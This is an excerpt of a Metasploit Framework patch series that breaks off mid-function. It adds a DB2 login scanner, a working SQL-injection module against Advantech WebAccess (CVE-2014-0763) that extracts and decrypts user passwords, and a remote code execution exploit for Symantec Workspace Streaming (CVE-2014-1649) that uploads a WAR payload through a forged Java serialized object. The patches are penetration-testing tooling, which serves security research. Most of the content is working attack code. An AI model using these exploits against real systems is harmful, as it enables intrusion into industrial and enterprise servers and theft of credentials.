From 5dcf3efd1a7615a513685a1e8ae4db68ec4ee739 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Tue, 13 May 2014 13:16:56 -0500 Subject: [PATCH 01/33] skeleton for DB2 loginscanner add basic skeleton and specs for the DB2 LoginScanner class. --- lib/metasploit/framework/login_scanner/db2.rb | 18 ++++++++++++++++++ .../framework/login_scanner/db2_spec.rb | 12 ++++++++++++ 2 files changed, 30 insertions(+) create mode 100644 lib/metasploit/framework/login_scanner/db2.rb create mode 100644 spec/lib/metasploit/framework/login_scanner/db2_spec.rb diff --git a/lib/metasploit/framework/login_scanner/db2.rb b/lib/metasploit/framework/login_scanner/db2.rb new file mode 100644 index 0000000000..71b84465ea --- /dev/null +++ b/lib/metasploit/framework/login_scanner/db2.rb @@ -0,0 +1,18 @@ +require 'metasploit/framework/login_scanner/base' +require 'metasploit/framework/login_scanner/rex_socket' + +module Metasploit + module Framework + module LoginScanner + # This is the LoginScanner class for dealing with DB2 Database servers. + # It is responsible for taking a single target, and a list of credentials + # and attempting them. It then saves the results. + class DB2 + include Metasploit::Framework::LoginScanner::Base + include Metasploit::Framework::LoginScanner::RexSocket + + end + + end + end +end \ No newline at end of file diff --git a/spec/lib/metasploit/framework/login_scanner/db2_spec.rb b/spec/lib/metasploit/framework/login_scanner/db2_spec.rb new file mode 100644 index 0000000000..dd9d0ad826 --- /dev/null +++ b/spec/lib/metasploit/framework/login_scanner/db2_spec.rb @@ -0,0 +1,12 @@ +require 'spec_helper' +require 'metasploit/framework/login_scanner/db2' + +describe Metasploit::Framework::LoginScanner::DB2 do + + subject(:login_scanner) { described_class.new } + + it_behaves_like 'Metasploit::Framework::LoginScanner::Base' + it_behaves_like 'Metasploit::Framework::LoginScanner::RexSocket' + + +end \ No newline at end of file From f5751d6a853fab4266de1b8f251823c30e77e116 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Tue, 13 May 2014 14:10:30 -0500 Subject: [PATCH 02/33] first pass at attempt_login for DB2 first pass through at the attempt_login method for the DB2 LoginScanner. still adding specs and possibly refactoring --- lib/metasploit/framework/login_scanner/db2.rb | 84 +++++++++++++++++++ .../framework/login_scanner/db2_spec.rb | 34 +++++++- 2 files changed, 117 insertions(+), 1 deletion(-) diff --git a/lib/metasploit/framework/login_scanner/db2.rb b/lib/metasploit/framework/login_scanner/db2.rb index 71b84465ea..712ef82eb7 100644 --- a/lib/metasploit/framework/login_scanner/db2.rb +++ b/lib/metasploit/framework/login_scanner/db2.rb @@ -1,3 +1,4 @@ +require 'metasploit/framework/tcp/client' require 'metasploit/framework/login_scanner/base' require 'metasploit/framework/login_scanner/rex_socket' @@ -10,7 +11,90 @@ module Metasploit class DB2 include Metasploit::Framework::LoginScanner::Base include Metasploit::Framework::LoginScanner::RexSocket + include Metasploit::Framework::Tcp::Client + # (see Base#attempt_login) + def attempt_login(credential) + result_options = { + credential: credential + } + + begin + probe_data = send_probe(credential.realm) + + if probe_data.empty? + result_options[:status] = :connection_error + else + # Send the login packet and get a response packet back + login_packet = Rex::Proto::DRDA::Utils.client_auth(:dbname => credential.realm, + :dbuser => credential.public, + :dbpass => credential.private + ) + sock.put login_packet + response = sock.get_once + + if valid_response?(response) + if successful_login?(response) + result_options[:status] = :success + else + result_options[:status] = :failed + end + else + result_options[:status] = :connection_error + end + end + rescue ::Rex::ConnectionError, ::Rex::ConnectionTimeout, ::Rex::Proto::DRDA::RespError,::Timeout::Error => e + result_options.merge!({ + status: :connection_error, + proof: e.message + }) + end + + ::Metasploit::Framework::LoginScanner::Result.new(result_options) + end + + private + # This method opens a socket to the target DB2 server.do + # It then sends a client probe on that socket to get information + # back on the server. + # @param database_name [String] The name of the database to probe + # @return [Hash] A hash containing the server information from the probe reply + def send_probe(database_name) + disconnect if self.sock + connect + + probe_packet = Rex::Proto::DRDA::Utils.client_probe(database_name) + sock.put probe_packet + response = sock.get_once + + return {} unless valid_response?(response) + packet = Rex::Proto::DRDA::SERVER_PACKET.new.read(response) + Rex::Proto::DRDA::Utils.server_packet_info(packet) + end + + # This method takes a response packet and checks to see + # if the authentication was actually successful. + # + # @param response [String] The unprocessed response packet + # @return [Boolean] Whether the authentication was successful + def successful_login?(response) + packet = Rex::Proto::DRDA::SERVER_PACKET.new.read(response) + packet_info = Rex::Proto::DRDA::Utils.server_packet_info(packet) + if packet_info[:db_login_success] + true + else + false + end + end + + # This method provides a simple test on whether the response + # packet was valid. + # + # @param response [String] The response to examine from the socket + # @return [Boolean] Whether the response is valid + def valid_response?(response) + response and response.length > 0 + end end end diff --git a/spec/lib/metasploit/framework/login_scanner/db2_spec.rb b/spec/lib/metasploit/framework/login_scanner/db2_spec.rb index dd9d0ad826..222f2d41f3 100644 --- a/spec/lib/metasploit/framework/login_scanner/db2_spec.rb +++ b/spec/lib/metasploit/framework/login_scanner/db2_spec.rb @@ -2,11 +2,43 @@ require 'spec_helper' require 'metasploit/framework/login_scanner/db2' describe Metasploit::Framework::LoginScanner::DB2 do - + let(:public) { 'root' } + let(:private) { 'toor' } + let(:test_cred) { + Metasploit::Framework::LoginScanner::Credential.new( public: public, private: private ) + } subject(:login_scanner) { described_class.new } it_behaves_like 'Metasploit::Framework::LoginScanner::Base' it_behaves_like 'Metasploit::Framework::LoginScanner::RexSocket' + context '#attempt_login' do + + context 'when the socket errors' do + it 'returns a connection_error result for an Rex::ConnectionError' do + my_scanner = login_scanner + my_scanner.should_receive(:connect).and_raise ::Rex::ConnectionError + result = my_scanner.attempt_login(test_cred) + expect(result.status).to eq :connection_error + expect(result.proof).to eq ::Rex::ConnectionError.new.to_s + end + + it 'returns a connection_error result for an Rex::ConnectionTimeout' do + my_scanner = login_scanner + my_scanner.should_receive(:connect).and_raise ::Rex::ConnectionTimeout + result = my_scanner.attempt_login(test_cred) + expect(result.status).to eq :connection_error + expect(result.proof).to eq ::Rex::ConnectionTimeout.new.to_s + end + + it 'returns a connection_error result for an ::Timeout::Error' do + my_scanner = login_scanner + my_scanner.should_receive(:connect).and_raise ::Timeout::Error + result = my_scanner.attempt_login(test_cred) + expect(result.status).to eq :connection_error + expect(result.proof).to eq ::Timeout::Error.new.to_s + end + end + end end \ No newline at end of file From a7075c7e082fc860305221e20068da90e79f6fbc Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 13 May 2014 14:17:59 -0500 Subject: [PATCH 03/33] Add module for ZDI-14-077 --- .../advantech_webaccess_dbvisitor_sqli.rb | 182 ++++++++++++++++++ 1 file changed, 182 insertions(+) create mode 100644 modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb diff --git a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb new file mode 100644 index 0000000000..1d6617fd25 --- /dev/null +++ b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb @@ -0,0 +1,182 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'rexml/document' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include REXML + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Advantech WebAccess SQL Injection', + 'Description' => %q{ + This module exploits a SQL injection vulnerability found in Advantech WebAccess 7.1. The + vulnerability exists in the DBVisitor.dll component, and can be abused through malicious + requests to the ChartThemeConfig web service. This module can be used to extract the BEMS + site usernames and hashes. + }, + 'References' => + [ + [ 'CVE', '2014-0763' ], + [ 'ZDI', '14-077' ], + [ 'OSVDB', '105572' ], + [ 'BID', '66740' ], + [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-14-079-03' ] + ], + 'Author' => + [ + 'rgod ', # Vulnerability Discovery + 'juan vazquez' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'DisclosureDate' => "Apr 08 2014" + )) + + register_options( + [ + OptString.new("TARGETURI", [true, 'The path to the BEMS Web Site', '/BEMS']) + ], self.class) + end + + def build_soap(injection) + xml = Document.new + xml.add_element( + "s:Envelope", + { + 'xmlns:s' => "http://schemas.xmlsoap.org/soap/envelope/" + }) + xml.root.add_element("s:Body") + body = xml.root.elements[1] + body.add_element( + "GetThemeNameList", + { + 'xmlns' => "http://tempuri.org/" + }) + name_list = body.elements[1] + name_list.add_element("userName") + name_list.elements['userName'].text = injection + + xml.to_s + end + + def do_sqli(injection, mark) + xml = build_soap(injection) + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path.to_s, "Services", "ChartThemeConfig.svc"), + 'ctype' => 'text/xml; charset=UTF-8', + 'headers' => { + 'SOAPAction' => '"http://tempuri.org/IChartThemeConfig/GetThemeNameList"' + }, + 'data' => xml + }) + + unless res and res.code == 200 and res.body.to_s =~ /#{mark}/ + return nil + end + + res.body.to_s + end + + def check + mark = Rex::Text.rand_text_alpha(8 + rand(5)) + injection = "#{Rex::Text.rand_text_alpha(8 + rand(5))}' " + injection << "union all select '#{mark}' from BAThemeSetting where '#{Rex::Text.rand_text_alpha(2)}'='#{Rex::Text.rand_text_alpha(3)}" + data = do_sqli(injection, mark) + + if data.nil? + return Msf::Exploit::CheckCode::Safe + end + + Msf::Exploit::CheckCode::Vulnerable + end + + def parse_users(xml, mark) + doc = Document.new(xml) + + strings = XPath.match(doc, "s:Envelope/s:Body/GetThemeNameListResponse/GetThemeNameListResult/a:string") + strings_length = strings.length + + unless strings_length > 1 + return + end + + i = 0 + strings.each do |result| + next if result.text == mark + if i < (strings_length / 3) + @users.push(result.text) + elsif i < (strings_length / 3) * 2 + @passwords.push(result.text) + else + @passwords2.push(result.text) + end + i = i + 1 + end + + end + + def run + print_status("#{peer} - Exploiting sqli to extract users information...") + mark = Rex::Text.rand_text_alpha(8 + rand(5)) + # While installing I can only configure an Access backend, but + # according to documentation other backends are supported. This + # injection should be compatible, hopefully, with most backends. + injection = "#{Rex::Text.rand_text_alpha(8 + rand(5))}' " + injection << "union all select UserName from BAUser where 1=1 " + injection << "union all select Password from BAUser where 1=1 " + injection << "union all select Password2 from BAUser where 1=1 " + injection << "union all select '#{mark}' from BAThemeSetting where '#{Rex::Text.rand_text_alpha(2)}'='#{Rex::Text.rand_text_alpha(3)}" + data = do_sqli(injection, mark) + + if data.blank? + print_error("#{peer} - Error exploiting sqli") + return + end + + @users = [] + @passwords = [] + @passwords2 = [] + + print_status("#{peer} - Parsing extracted data...") + parse_users(data, mark) + + if @users.empty? + print_error("#{peer} - Users not found") + else + print_good("#{peer} - #{@users.length} users found!") + end + + users_table = Rex::Ui::Text::Table.new( + 'Header' => 'vBulletin Users', + 'Ident' => 1, + 'Columns' => ['Username', 'Password Hash', 'Password Hash 2'] + ) + + for i in 0..@users.length - 1 + report_auth_info({ + :host => rhost, + :port => rport, + :user => @users[i], + :pass => "#{@passwords[i]}:#{@passwords2[i]}", + :type => "hash", + :sname => (ssl ? "https" : "http"), + :proof => data # Using proof to store the hash salt + }) + users_table << [@users[i], @passwords[i], @passwords2[i]] + end + + print_line(users_table.to_s) + + end + + +end + From 72b3c4da3509f2a179831c42a03844ccb06c654e Mon Sep 17 00:00:00 2001 From: David Maloney Date: Tue, 13 May 2014 14:41:15 -0500 Subject: [PATCH 04/33] working DB2 loginscanner w00t --- lib/metasploit/framework/login_scanner/db2.rb | 48 +++++++++++++------ 1 file changed, 33 insertions(+), 15 deletions(-) diff --git a/lib/metasploit/framework/login_scanner/db2.rb b/lib/metasploit/framework/login_scanner/db2.rb index 712ef82eb7..8c4e6bfbbb 100644 --- a/lib/metasploit/framework/login_scanner/db2.rb +++ b/lib/metasploit/framework/login_scanner/db2.rb @@ -25,22 +25,10 @@ module Metasploit if probe_data.empty? result_options[:status] = :connection_error else - # Send the login packet and get a response packet back - login_packet = Rex::Proto::DRDA::Utils.client_auth(:dbname => credential.realm, - :dbuser => credential.public, - :dbpass => credential.private - ) - sock.put login_packet - response = sock.get_once - - if valid_response?(response) - if successful_login?(response) - result_options[:status] = :success - else - result_options[:status] = :failed - end + if authenticate?(credential) + result_options[:status] = :success else - result_options[:status] = :connection_error + result_options[:status] = :failed end end rescue ::Rex::ConnectionError, ::Rex::ConnectionTimeout, ::Rex::Proto::DRDA::RespError,::Timeout::Error => e @@ -54,6 +42,28 @@ module Metasploit end private + # This method takes the credential and actually attempts the authentication + # @param credential [Credential] The Credential object to authenticate with. + # @return [Boolean] Whether the authentication was successful + def authenticate?(credential) + # Send the login packet and get a response packet back + login_packet = Rex::Proto::DRDA::Utils.client_auth(:dbname => credential.realm, + :dbuser => credential.public, + :dbpass => credential.private + ) + sock.put login_packet + response = sock.get_once + if valid_response?(response) + if successful_login?(response) + true + else + false + end + else + false + end + end + # This method opens a socket to the target DB2 server.do # It then sends a client probe on that socket to get information # back on the server. @@ -72,6 +82,14 @@ module Metasploit Rex::Proto::DRDA::Utils.server_packet_info(packet) end + # This method sets the sane defaults for things + # like timeouts and TCP evasion options + def set_sane_defaults + self.max_send_size = 0 if self.max_send_size.nil? + self.send_delay = 0 if self.send_delay.nil? + self.ssl = false if self.ssl.nil? + end + # This method takes a response packet and checks to see # if the authentication was actually successful. # From 5b3bb8fb3b25e6e8358fa97af5b7f9865ee3efd8 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 14 May 2014 09:00:13 -0500 Subject: [PATCH 05/33] Fix @FireFart's review --- .../advantech_webaccess_dbvisitor_sqli.rb | 22 ++++++++++--------- 1 file changed, 12 insertions(+), 10 deletions(-) diff --git a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb index 1d6617fd25..fc0b0b772a 100644 --- a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb +++ b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb @@ -78,7 +78,7 @@ class Metasploit3 < Msf::Auxiliary 'data' => xml }) - unless res and res.code == 200 and res.body.to_s =~ /#{mark}/ + unless res && res.code == 200 && res.body && res.body.include?(mark) return nil end @@ -101,7 +101,7 @@ class Metasploit3 < Msf::Auxiliary def parse_users(xml, mark) doc = Document.new(xml) - strings = XPath.match(doc, "s:Envelope/s:Body/GetThemeNameListResponse/GetThemeNameListResult/a:string") + strings = XPath.match(doc, "s:Envelope/s:Body/GetThemeNameListResponse/GetThemeNameListResult/a:string").map(&:text) strings_length = strings.length unless strings_length > 1 @@ -110,13 +110,13 @@ class Metasploit3 < Msf::Auxiliary i = 0 strings.each do |result| - next if result.text == mark + next if result == mark if i < (strings_length / 3) - @users.push(result.text) + @users.push(result) elsif i < (strings_length / 3) * 2 - @passwords.push(result.text) + @passwords.push(result) else - @passwords2.push(result.text) + @passwords2.push(result) end i = i + 1 end @@ -126,13 +126,14 @@ class Metasploit3 < Msf::Auxiliary def run print_status("#{peer} - Exploiting sqli to extract users information...") mark = Rex::Text.rand_text_alpha(8 + rand(5)) + rand = Rex::Text.rand_text_numeric(2) # While installing I can only configure an Access backend, but # according to documentation other backends are supported. This # injection should be compatible, hopefully, with most backends. injection = "#{Rex::Text.rand_text_alpha(8 + rand(5))}' " - injection << "union all select UserName from BAUser where 1=1 " - injection << "union all select Password from BAUser where 1=1 " - injection << "union all select Password2 from BAUser where 1=1 " + injection << "union all select UserName from BAUser where #{rand}=#{rand} " + injection << "union all select Password from BAUser where #{rand}=#{rand} " + injection << "union all select Password2 from BAUser where #{rand}=#{rand} " injection << "union all select '#{mark}' from BAThemeSetting where '#{Rex::Text.rand_text_alpha(2)}'='#{Rex::Text.rand_text_alpha(3)}" data = do_sqli(injection, mark) @@ -150,12 +151,13 @@ class Metasploit3 < Msf::Auxiliary if @users.empty? print_error("#{peer} - Users not found") + return else print_good("#{peer} - #{@users.length} users found!") end users_table = Rex::Ui::Text::Table.new( - 'Header' => 'vBulletin Users', + 'Header' => 'Advantech WebAccess Users', 'Ident' => 1, 'Columns' => ['Username', 'Password Hash', 'Password Hash 2'] ) From 472f029576b117112baeeed169d45635495eeaa5 Mon Sep 17 00:00:00 2001 From: James Lee Date: Thu, 15 May 2014 13:27:37 -0500 Subject: [PATCH 06/33] Fix random bug when workstation_name is < 6 chars When the local workstation name is less than 6 characters, remote authentication against a Windows 2008r2 WinRM service always fails. This doesn't seem to affect authentication against IIS's negotiate implementation. --- lib/rex/proto/http/client.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index d29e677839..b8efa19929 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -480,7 +480,7 @@ class Client opts['headers']||= {} ntlmssp_flags = ::Rex::Proto::NTLM::Utils.make_ntlm_flags(ntlm_options) - workstation_name = Rex::Text.rand_text_alpha(rand(8)+1) + workstation_name = Rex::Text.rand_text_alpha(rand(8)+6) domain_name = self.config['domain'] b64_blob = Rex::Text::encode_base64( From 1b68abe95595256c2bc8f7fbe8fcb8d408f68d8d Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 15 May 2014 13:41:52 -0500 Subject: [PATCH 07/33] Add module for ZDI-14-127 --- .../symantec_workspace_streaming_exec.rb | 356 ++++++++++++++++++ 1 file changed, 356 insertions(+) create mode 100644 modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb diff --git a/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb b/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb new file mode 100644 index 0000000000..9e77e808f0 --- /dev/null +++ b/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb @@ -0,0 +1,356 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'rexml/document' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + include REXML + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Symantec Workspace Streaming Arbitrary File Upload', + 'Description' => %q{ + This module exploits a code execution flaw in Symantec Workspace Streaming. The + vulnerability exists in the ManagementAgentServer.putFile XMLRPC call exposed by the + as_agent.exe service, which allows to upload arbitrary files under the server root. + This module abuses the auto deploy feature at the JBoss as_ste.exe's instance in order + to achieve remote code execution. This module has been tested successfully on Symantec + Workspace Streaming 6.1 SP8 and Windows 2003 SP2. Abused services listen on a single + machine deployment, and also at the backend role in a multiple machines deployment + }, + 'Author' => + [ + 'rgod ', # Vulnerability discovery + 'juan vazquez' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2014-1649'], + ['BID', '67189'], + ['ZDI', '14-127'], + ['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20140512_00'] + ], + 'Privileged' => true, + 'Platform' => 'java', + 'Arch' => ARCH_JAVA, + 'Targets' => + [ + [ 'Symantec Workspace Streaming 6.1 SP8 / Java Universal', {} ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'May 12 2014')) + + register_options( + [ + Opt::RPORT(9855), # as_agent.exe (afuse XMLRPC to upload arbitrary file) + OptPort.new('STE_PORT', [true, "The remote as_ste.exe AS server port", 9832]), # as_ste.exe (abuse jboss auto deploy) + ], self.class) + end + + def send_xml_rpc_request(xml) + res = send_request_cgi( + { + 'uri' => normalize_uri("/", "xmlrpc"), + 'method' => 'POST', + 'ctype' => 'text/xml; charset=UTF-8', + 'data' => xml + }) + + res + end + + def build_soap_get_file(file_path) + xml = Document.new + xml.add_element( + "methodCall", + { + 'xmlns:ex' => "http://ws.apache.org/xmlrpc/namespaces/extensions" + }) + method_name = xml.root.add_element("methodName") + method_name.text = "ManagementAgentServer.getFile" + + params = xml.root.add_element("params") + + param_server_root = params.add_element("param") + value_server_root = param_server_root.add_element("value") + value_server_root.text = "*AWESE" + + param_file_type = params.add_element("param") + value_file_type = param_file_type.add_element("value") + type_file_type = value_file_type.add_element("i4") + type_file_type.text = "0" # build path from the server root directory + + param_file_name = params.add_element("param") + value_file_name = param_file_name.add_element("value") + value_file_name.text = file_path + + param_file_binary = params.add_element("param") + value_file_binary = param_file_binary.add_element("value") + type_file_binary = value_file_binary.add_element("boolean") + type_file_binary.text = "0" + + xml << XMLDecl.new("1.0", "UTF-8") + + xml.to_s + end + + def build_soap_put_file(file) + xml = Document.new + xml.add_element( + "methodCall", + { + 'xmlns:ex' => "http://ws.apache.org/xmlrpc/namespaces/extensions" + }) + method_name = xml.root.add_element("methodName") + method_name.text = "ManagementAgentServer.putFile" + + params = xml.root.add_element("params") + + param_server_root = params.add_element("param") + value_server_root = param_server_root.add_element("value") + value_server_root.text = "*AWESE" + + param_file_type = params.add_element("param") + value_file_type = param_file_type.add_element("value") + type_file_type = value_file_type.add_element("i4") + type_file_type.text = "0" # build path from the server root directory + + param_file = params.add_element("param") + value_file = param_file.add_element("value") + type_value_file = value_file.add_element("ex:serializable") + type_value_file.text = file + + xml << XMLDecl.new("1.0", "UTF-8") + + xml.to_s + end + + def build_soap_check_put + xml = Document.new + xml.add_element( + "methodCall", + { + 'xmlns:ex' => "http://ws.apache.org/xmlrpc/namespaces/extensions" + }) + method_name = xml.root.add_element("methodName") + method_name.text = "ManagementAgentServer.putFile" + xml.root.add_element("params") + xml << XMLDecl.new("1.0", "UTF-8") + xml.to_s + end + + def parse_method_response(xml) + doc = Document.new(xml) + file = XPath.first(doc, "methodResponse/params/param/value/ex:serializable") + + unless file.nil? + file = Rex::Text.decode_base64(file.text) + end + + file + end + + def get_file(path) + xml_call = build_soap_get_file(path) + file = nil + + res = send_xml_rpc_request(xml_call) + + if res && res.code == 200 && res.body + file = parse_method_response(res.body.to_s) + end + + file + end + + def put_file(file) + result = nil + xml_call = build_soap_put_file(file) + + res = send_xml_rpc_request(xml_call) + + if res && res.code == 200 && res.body + result = parse_method_response(res.body.to_s) + end + + result + end + + def upload_war(war_name, war, dst) + result = false + java_file = build_java_file_info("#{dst}#{war_name}", war) + java_file = Rex::Text.encode_base64(java_file) + + res = put_file(java_file) + + if res && res =~ /ReturnObject.*StatusMessage.*Boolean/ + result = true + end + + result + end + + def jboss_deploy_path + path = nil + leak = get_file("bin/CreateDatabaseSchema.cmd") + + if leak && leak =~ /\[INSTALLDIR\](.*)ste\/ste.jar/ + path = $1 + end + + path + end + + def check + check_result = Exploit::CheckCode::Safe + + if jboss_deploy_path.nil? + xml = build_soap_check_put + res = send_xml_rpc_request(xml) + + if res && res.code == 200 && res.body && res.body.to_s =~ /No method matching arguments/ + check_result = Exploit::CheckCode::Detected + end + else + check_result = Exploit::CheckCode::Appears + end + + check_result + end + + def exploit + print_status("#{peer} - Leaking the jboss deployment directory...") + jboss_path =jboss_deploy_path + + if jboss_path.nil? + fail_with(Exploit::Unknown, "#{peer} - Failed to disclose the jboss deployment directory") + end + + print_status("#{peer} - Building WAR payload...") + + app_name = Rex::Text.rand_text_alpha(4 + rand(4)) + war_name = "#{app_name}.war" + war = payload.encoded_war({ :app_name => app_name }).to_s + deploy_dir = "..#{jboss_path}" + + print_status("#{peer} - Uploading WAR payload...") + + res = upload_war(war_name, war, deploy_dir) + + unless res + fail_with(Exploit::Unknown, "#{peer} - Failed to upload the war payload") + end + + register_files_for_cleanup("../server/appstream/deploy/#{war_name}") + + 10.times do + select(nil, nil, nil, 2) + + # Now make a request to trigger the newly deployed war + print_status("#{rhost}:#{ste_port} - Attempting to launch payload in deployed WAR...") + res = send_request_cgi( + { + 'uri' => normalize_uri("/", app_name, Rex::Text.rand_text_alpha(rand(8)+8)), + 'method' => 'GET', + 'rport' => ste_port # Auto Deploy can be reached through the "as_ste.exe" service + }) + # Failure. The request timed out or the server went away. + break if res.nil? + # Success! Triggered the payload, should have a shell incoming + break if res.code == 200 + end + + end + + def ste_port + datastore['STE_PORT'] + end + + # com.appstream.cm.general.FileInfo serialized object + def build_java_file_info(file_name, contents) + stream = "\xac\xed" # stream magic + stream << "\x00\x05" # stream version + stream << "\x73" # new Object + + stream << "\x72" # TC_CLASSDESC + stream << ["com.appstream.cm.general.FileInfo".length].pack("n") + stream << "com.appstream.cm.general.FileInfo" + stream << "\xa3\x02\xb6\x1e\xa1\x6b\xf0\xa7" # class serial version identifier + stream << "\x02" # flags SC_SERIALIZABLE + stream << [6].pack("n") # number of fields in the class + + stream << "Z" # boolean + stream << ["bLastPage".length].pack("n") + stream << "bLastPage" + + stream << "J" # long + stream << ["lFileSize".length].pack("n") + stream << "lFileSize" + + stream << "[" # array + stream << ["baContent".length].pack("n") + stream << "baContent" + stream << "\x74" # TC_STRING + stream << ["[B".length].pack("n") + stream << "[B" # field's type (byte array) + + stream << "L" # Object + stream << ["dTimeStamp".length].pack("n") + stream << "dTimeStamp" + stream << "\x74" # TC_STRING + stream << ["Ljava/util/Date;".length].pack("n") + stream << "Ljava/util/Date;" #field's type (Date) + + stream << "L" # Object + stream << ["sContent".length].pack("n") + stream << "sContent" + stream << "\x74" # TC_STRING + stream << ["Ljava/lang/String;".length].pack("n") + stream << "Ljava/lang/String;" #field's type (String) + + stream << "L" # Object + stream << ["sFileName".length].pack("n") + stream << "sFileName" + stream << "\x71" # TC_REFERENCE + stream << [0x007e0003].pack("N") # handle + + stream << "\x78" # TC_ENDBLOCKDATA + stream << "\x70" # TC_NULL + + # Values + stream << [1].pack("c") # bLastPage + + stream << [0xffffffff, 0xffffffff].pack("NN") # lFileSize + + stream << "\x75" # TC_ARRAY + stream << "\x72" # TC_CLASSDESC + stream << ["[B".length].pack("n") + stream << "[B" # byte array) + stream << "\xac\xf3\x17\xf8\x06\x08\x54\xe0" # class serial version identifier + stream << "\x02" # flags SC_SERIALIZABLE + stream << [0].pack("n") # number of fields in the class + stream << "\x78" # TC_ENDBLOCKDATA + stream << "\x70" # TC_NULL + stream << [contents.length].pack("N") + stream << contents # baContent + + stream << "\x70" # TC_NULL # dTimeStamp + + stream << "\x70" # TC_NULL # sContent + + stream << "\x74" # TC_STRING + stream << [file_name.length].pack("n") + stream << file_name # sFileName + + stream + end + +end From 9091ce443a084746c405278d8a8bd11b1566ff44 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Fri, 16 May 2014 00:59:27 -0500 Subject: [PATCH 08/33] Add suport to decode passwords --- .../advantech_webaccess_dbvisitor_sqli.rb | 120 ++++++++++++++++-- 1 file changed, 110 insertions(+), 10 deletions(-) diff --git a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb index fc0b0b772a..8985ee25e3 100644 --- a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb +++ b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb @@ -114,9 +114,9 @@ class Metasploit3 < Msf::Auxiliary if i < (strings_length / 3) @users.push(result) elsif i < (strings_length / 3) * 2 - @passwords.push(result) + @enc_passwords.push(result) else - @passwords2.push(result) + @keys.push(result) end i = i + 1 end @@ -143,8 +143,9 @@ class Metasploit3 < Msf::Auxiliary end @users = [] - @passwords = [] - @passwords2 = [] + @enc_passwords = [] + @keys = [] + @plain_passwords = [] print_status("#{peer} - Parsing extracted data...") parse_users(data, mark) @@ -159,26 +160,125 @@ class Metasploit3 < Msf::Auxiliary users_table = Rex::Ui::Text::Table.new( 'Header' => 'Advantech WebAccess Users', 'Ident' => 1, - 'Columns' => ['Username', 'Password Hash', 'Password Hash 2'] + 'Columns' => ['Username', 'Encrypted Password', 'Key', 'Recovered password'] ) for i in 0..@users.length - 1 + @plain_passwords[i] = decrypt_password(@enc_passwords[i], @keys[i]) + @plain_passwords[i] = "(blank password)" if @plain_passwords[i].empty? report_auth_info({ :host => rhost, :port => rport, :user => @users[i], - :pass => "#{@passwords[i]}:#{@passwords2[i]}", - :type => "hash", + :pass => @plain_passwords[i], + :type => "password", :sname => (ssl ? "https" : "http"), - :proof => data # Using proof to store the hash salt + :proof => "Leaked encrypted password: #{@enc_passwords[i]}:#{@keys[i]}" }) - users_table << [@users[i], @passwords[i], @passwords2[i]] + users_table << [@users[i], @enc_passwords[i], @keys[i], @plain_passwords[i]] end print_line(users_table.to_s) - end + def decrypt_password(password, key) + recovered_password = recover_password(password) + recovered_key = recover_key(key) + + recovered_bytes = decrypt_bytes(recovered_password, recovered_key) + password = [] + + recovered_bytes.each { |b| + if b == 0 + break + else + password.push(b) + end + } + + return password.pack("C*") + end + + def recover_password(password) + bytes = password.unpack("C*") + recovered = [] + + i = 0 + j = 0 + while i < 16 + low = bytes[i] + + if low < 0x41 + low = low - 0x30 + else + low = low - 0x37 + end + + low = low * 16 + + high = bytes[i+1] + if high < 0x41 + high = high - 0x30 + else + high = high - 0x37 + end + + recovered_byte = low + high + + recovered[j] = recovered_byte + + i = i + 2 + j = j + 1 + end + + recovered + end + + def recover_key(key) + bytes = key.unpack("C*") + recovered = 0 + + bytes[0, 8].each { |b| + recovered = recovered * 16 + if b < 0x41 + byte_weight = b - 0x30 + else + byte_weight = b - 0x37 + end + + recovered = recovered + byte_weight + } + + recovered + end + + def decrypt_bytes(bytes, key) + result = [] + xor_table = [0xaa, 0xa5, 0x5a, 0x55] + key_copy = key + for i in 0..7 + byte = (crazy(bytes[i] ,8 - (key & 7)) & 0xff) + result.push(byte ^ xor_table[key_copy & 3]) + key_copy = key_copy / 4 + key = key / 8 + end + + result + end + + def crazy(byte, magic) + result = byte & 0xff + + while magic > 0 + result = result * 2 + if result & 0x100 == 0x100 + result = result + 1 + end + magic = magic - 